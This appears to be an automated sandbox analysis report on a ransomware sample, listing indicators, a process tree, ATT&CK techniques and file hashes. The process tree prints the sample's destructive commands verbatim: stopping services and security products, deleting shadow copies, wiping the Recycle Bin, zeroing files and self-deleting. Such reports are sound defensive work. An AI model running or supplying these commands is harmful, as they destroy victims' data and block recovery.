5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	2132	taskkill.exe
Token: SeDebugPrivilege	5888	taskkill.exe
Token: SeDebugPrivilege	648	taskkill.exe
Token: SeDebugPrivilege	3768	taskkill.exe
Token: SeDebugPrivilege	5840	taskkill.exe
Token: SeDebugPrivilege	5040	taskkill.exe
Token: SeDebugPrivilege	4544	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	4920	taskkill.exe
Token: SeDebugPrivilege	5136	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	3388	taskkill.exe
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	5832	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	6080	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	3316	taskkill.exe
Token: SeDebugPrivilege	4600	taskkill.exe
Token: SeDebugPrivilege	3148	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	4048	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	4892	taskkill.exe
Token: SeDebugPrivilege	4808	taskkill.exe
Token: SeDebugPrivilege	4784	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	3152	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	4908	taskkill.exe
Token: SeDebugPrivilege	5600	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	3400	taskkill.exe
Token: SeDebugPrivilege	4384	taskkill.exe
Token: SeDebugPrivilege	2612	taskkill.exe
Token: SeDebugPrivilege	4876	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	4796	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
5920	SearchHost.exe
1288	SearchHost.exe
6732	SearchHost.exe
2648	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5852 wrote to memory of 5612	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	78
PID 5852 wrote to memory of 5612	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	78
PID 5852 wrote to memory of 5592	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	79
PID 5852 wrote to memory of 5592	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	79
PID 5852 wrote to memory of 412	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 5852 wrote to memory of 412	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	80
PID 5852 wrote to memory of 2504	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	81
PID 5852 wrote to memory of 2504	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	81
PID 5852 wrote to memory of 5888	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 5852 wrote to memory of 5888	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	82
PID 5852 wrote to memory of 1836	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	83
PID 5852 wrote to memory of 1836	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	83
PID 5852 wrote to memory of 648	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	84
PID 5852 wrote to memory of 648	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	84
PID 5852 wrote to memory of 2788	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 5852 wrote to memory of 2788	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	85
PID 5852 wrote to memory of 2072	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	86
PID 5852 wrote to memory of 2072	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	86
PID 5852 wrote to memory of 2132	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	87
PID 5852 wrote to memory of 2132	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	87
PID 5852 wrote to memory of 5832	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 5852 wrote to memory of 5832	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	88
PID 5852 wrote to memory of 5840	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 5852 wrote to memory of 5840	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	89
PID 5852 wrote to memory of 2616	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 5852 wrote to memory of 2616	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	90
PID 5852 wrote to memory of 2612	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 5852 wrote to memory of 2612	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	91
PID 5852 wrote to memory of 5136	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 5852 wrote to memory of 5136	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	92
PID 5852 wrote to memory of 1636	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 5852 wrote to memory of 1636	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	93
PID 5852 wrote to memory of 1500	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	94
PID 5852 wrote to memory of 1500	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	94
PID 5852 wrote to memory of 4048	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 5852 wrote to memory of 4048	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	95
PID 5852 wrote to memory of 1112	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 5852 wrote to memory of 1112	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	96
PID 5852 wrote to memory of 6080	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	97
PID 5852 wrote to memory of 6080	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	97
PID 5852 wrote to memory of 2684	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	111
PID 5852 wrote to memory of 2684	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	111
PID 5852 wrote to memory of 3768	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	112
PID 5852 wrote to memory of 3768	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	112
PID 5852 wrote to memory of 2092	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	113
PID 5852 wrote to memory of 2092	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	113
PID 5852 wrote to memory of 4640	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 5852 wrote to memory of 4640	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	114
PID 5852 wrote to memory of 5320	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	115
PID 5852 wrote to memory of 5320	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	115
PID 5852 wrote to memory of 4600	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	116
PID 5852 wrote to memory of 4600	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	116
PID 5852 wrote to memory of 3400	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	117
PID 5852 wrote to memory of 3400	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	117
PID 5852 wrote to memory of 3152	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	118
PID 5852 wrote to memory of 3152	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	118
PID 5852 wrote to memory of 3148	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	119
PID 5852 wrote to memory of 3148	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	119
PID 5852 wrote to memory of 2372	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	120
PID 5852 wrote to memory of 2372	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	120
PID 5852 wrote to memory of 4384	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	121
PID 5852 wrote to memory of 4384	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	121
PID 5852 wrote to memory of 3388	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	122
PID 5852 wrote to memory of 3388	5852	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	122

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5852
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:5612
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:5592
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:412
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:2504
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5888
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1836
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2132
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5840
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5136
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1500
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4048
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6080
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:5320
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3148
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2372
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4384
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4768
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4544
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5600
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4752
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4808
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4832
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4904
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4908
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4920
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5024
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5032
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5044
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:2908
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3368
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4208
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:6556
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
  2⤵
  PID:1436
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6656

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5920

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1288

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6732

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39d9055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2648

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

Filesize
1.3MB

MD5
0939171c97148d177006b65ca005965e

SHA1
7ba0b3a8060022eafe25e17fa3b8c19c1a0236bf

SHA256
62c4bf36a150f5c80f80b8535ae9a1ad18f65f7c6a889e226ced4c253e9b3c10

SHA512
06315a6c596ec6e139bc9a6955f93bd134a9453c913d855fda41135a8b324cb29b1f95da7e9e5b90d5db048402f4f2daa03923a3ac2fe161274b125b2036ed4a

Download Submit
C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

Filesize
28.8MB

MD5
b18de9f38f991648527e050ce5f22756

SHA1
d33e9bbad39acb8ec2ebaabb408236ae0c9359b8

SHA256
8febf017fc6e95bd6573e96352d9ba4b462723dac43f7919b1d0b97d6c8a59b1

SHA512
9f8c6ce808a539dc80e8ef2c321c9fd5d6ac48882355238b8b0981df64f45f19ef9c4d190543117ee2b6a4bcd6b3e864e603c3e3c817655e52532fad975d5609

Download Submit
C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]

Filesize
728KB

MD5
568f896fe7891072d3173b78e6cb8423

SHA1
82da4222c0f3d3caa1f8d73e47bec33151a9ebb4

SHA256
1a699249fd1896add286e84aeb521615b598a708764f1416c029f2f528620ac2

